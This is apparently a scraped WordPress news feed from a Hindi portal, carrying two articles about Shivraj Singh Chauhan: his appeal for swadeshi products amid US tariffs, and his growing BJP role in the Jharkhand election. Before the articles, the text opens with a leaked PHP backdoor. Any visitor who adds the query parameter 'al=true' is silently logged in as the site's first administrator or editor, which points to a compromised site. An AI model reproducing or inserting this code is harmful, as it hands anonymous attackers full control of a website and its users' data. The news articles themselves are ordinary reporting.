// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Shivraj Singh Chauhan’s – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Fri, 29 Aug 2025 14:55:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 शिवराज सिंह चौहान बोले– टैरिफ लग रहा है, देशभक्ति की ज्वाला हर दिल में जलनी चाहिए https://pratyushaashakinayikiran.com/?p=181643 Fri, 29 Aug 2025 14:55:00 +0000 https://pratyushaashakinayikiran.com/?p=181643 मैसूर 
भारत पर 50 फीसदी टैरिफ लगाकर अमेरिकी राष्ट्रपति डोनाल्ड ट्रंप सबके निशाने पर आ गए हैं। भारत में स्वदेशी प्रोडक्ट्स के ज्यादा से ज्यादा इस्तेमाल की अपील की जा रही है। इस बीच, केंद्रीय कृषि मंत्री शिवराज सिंह चौहान ने भी ऐसी ही अपील करते हुए ट्रंप का बिना नाम लिए उन्हें अधिनायकवादी कह दिया है। उन्होंने कहा है कि आज टैरिफ लगाया जा रहा है, ऐसे में पूरे देश में देशभक्ति की भावना प्रज्वलित होनी चाहिए और स्वदेशी उत्पाद का इस्तेमाल करना चाहिए।

शिवराज सिंह चौहान ने कहा, ''मैं एक निवेदन करना चाहता हूं, विचारधारा के राजनीतिक मतभेद तो हैं, लेकिन राष्ट्रहित के मुद्दों पर पूरे देश को एक साथ खड़ा होना चाहिए। कुछ देशों के नेता अधिनायकवादी जैसा व्यवहार कर रहे हैं, जो पूरी दुनिया के लिए संकट बन गया है। ऐसे में, मैं खड़े होकर यह कहने का साहस करता हूं कि, भौतिकवाद की आग में जलती हुई मानवता को, अगर कोई शाश्वत शांति का मार्ग दिखाएगा, तो वह हमारा भारत, हमारा देश ही होगा। इसके अलावा और कोई रास्ता नहीं है, इसलिए जरूरी है कि हमारा देश मजबूत बने।''

केंद्रीय मंत्री ने आगे कहा, ''हमारे देश को दुनिया के लिए एक दिशा निर्धारित करने का प्रयास करना चाहिए। इसलिए, मैं आज भारत के सामने मौजूद चुनौतियों के विस्तार में नहीं जाना चाहता, लेकिन हमारे प्रधानमंत्री नरेंद्र मोदी ने एक अपील की है। आज का ताजा संकट, टैरिफ लगाए जा रहे हैं, ऐसे माहौल में, पूरे देश में देशभक्ति की भावना प्रज्वलित होनी चाहिए। प्रत्येक भारतीय को यह संकल्प लेना चाहिए कि हम अपने दैनिक जीवन में केवल उन्हीं उत्पादों का उपयोग करेंगे जो हमारे देश में बने हैं। यह जरूरी है कि हमारे देश की अर्थव्यवस्था मजबूत हो। मुझे पूरा विश्वास है कि देशवासी इस दिशा में एक नया इतिहास रचेंगे।''

 

]]>
मध्य प्रदेश के 17 वर्ष तक मुख्यमंत्री रहे शिवराज सिंह BJP में बढ़ रहा कद, झारखंड चुनाव में प्रभारी के तौर पर मिला फ्री-हैंड https://pratyushaashakinayikiran.com/?p=90100 Sat, 26 Oct 2024 12:06:00 +0000 https://pratyushaashakinayikiran.com/?p=90100 भोपाल
मध्य प्रदेश के 17 वर्ष तक मुख्यमंत्री रहे केंद्रीय कृषि और ग्रामीण विकास मंत्री शिवराज सिंह चौहान का कद प्रधानमंत्री नरेन्द्र मोदी कैबिनेट में लगातार बढ़ रहा है। पार्टी संगठन भी उन पर पूरा भरोसा कर रहा है। इसी कारण पार्टी ने उन्हें नवंबर में होने जा रहे झारखंड विधानसभा चुनाव का प्रभारी बनाया है। टिकट वितरण के बाद अब उन्हें चुनाव प्रबंधन संबंधी निर्णयों के लिए फ्री हैंड दे दिया गया है। हाल ही में शिवराज सिंह को पीएम की फ्लैगशिप योजनाओं के बेहतर क्रियान्वयन पर नजर रखने की जिम्मेदारी भी सौंपी गई है।

शिवराज की प्रचार शैली लोकप्रिय
दरअसल, शिवराज सिंह ऐसे नेता हैं, जिनमें जनता आम आदमी की छवि देखती है। उनका जनता से जुड़ने का तरीका बहुत ही सहज, सरल है। यही वजह है कि झारखंड में भी उनकी प्रचार शैली लोकप्रिय हो रही है। ओबीसी वर्ग को साधने की जिम्मेदारी भी उन्हीं पर है। आदिवासी क्षेत्रों में शिवराज की रैली और सभाओं में भी भीड़ उमड़ रही है।

ओबीसी वर्ग को शिवराज के जरिये साध रही भाजपा
वैसे तो भाजपा अपने दिग्गज नेताओं को जाति या समाज के चेहरे के रूप में पेश नहीं करती, लेकिन जातिगत समीकरणों को साधने के लिए उपयोग करने में भी पीछे नहीं रहती। ऐसे ही शिवराज सिंह चौहान का ओबीसी चेहरे के रूप में भाजपा में प्रभाव लगातार बढ़ रहा है। झारखंड में भी ओबीसी मतदाताओं को साधने के लिए उनका उपयोग किया जा रहा है। दरअसल, पहले भी शिवराज सिंह दूसरे राज्यों में चुनाव प्रचार में शामिल होते रहे हैं, साथ ही पार्टी के राष्ट्रीय कार्यक्रमों में आमंत्रित होते रहे हैं, लेकिन वर्तमान परिदृश्य में प्रधानमंत्री नरेन्द्र मोदी के बढ़ते भरोसे के बीच शिवराज की राष्ट्रीय स्तर पर उपस्थिति के खास मायने निकाले जा रहे हैं।

लगभग 40 प्रतिशत ओबीसी मतदाता
भाजपा झारखंड में अपना वोट शेयर 51 प्रतिशत करने के लिए प्रयास कर रही है। यहां ओबीसी मतदाताओं की संख्या 40 प्रतिशत के आसपास है। पिछले चुनाव में झारखंड मुक्ति मोर्चा ने ओबीसी आरक्षण की सीमा 14 से बढ़ाकर 27 करने का वादा किया था। भाजपा ने भी इसे चुनावी मुद्दा बनाया था।

कमजोर वर्ग में बदलाव लाने की शिवराज की छवि रही
शिवराज सिंह की छवि सफलतम मुख्यमंत्री के साथ किसानों, बेटियों और बुजुर्गों के लिए कल्याणकारी योजनाओं से बदलाव लाने की है। इसका लाभ झारखंड में भी देखने को मिल रहा है। जनता को अपनेपन से जोड़ना हो, महिला और बुजुर्गों के हित की योजना हो या सनातन धर्म का कोई विषय, शिवराज सिंह चौहान किसी भी मौके पर मंच लूटने वाले अग्रिम पंक्ति के वक्ताओं में शामिल हैं।

]]>